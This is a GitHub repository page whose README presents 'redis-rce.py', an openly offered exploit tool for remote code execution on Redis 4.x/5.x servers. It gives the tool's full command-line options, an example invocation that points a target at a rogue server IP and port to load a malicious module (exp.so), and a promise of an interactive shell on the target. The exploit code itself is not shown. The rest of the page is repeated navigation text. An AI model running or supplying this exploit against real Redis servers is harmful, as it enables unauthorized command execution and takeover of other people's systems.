Redis RCE

A exploit for Redis 4.x/5.x RCE, inspired by Redis post-exploitation.

This repo is a modified version of https://github.com/n0b0dyCN/redis-rogue-server .

Usage:

Compile exp.so from https://github.com/RicterZ/RedisModules-ExecuteCommand.

usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                    [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default exp.so
  -a AUTH, --auth AUTH  redis password
  -v, --verbose         show more info

example:

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so

The default target port is 6379 and the default vps port is 21000.

And you will get an interactive shell!

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
.gitignore		.gitignore
README.md		README.md
redis-rce.py		redis-rce.py
requirements.txt		requirements.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Redis RCE

Usage:

example:

About

Releases

Packages

Contributors 2

Languages

Ridter/redis-rce

Folders and files

Latest commit

History

Repository files navigation

Redis RCE

Usage:

example:

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages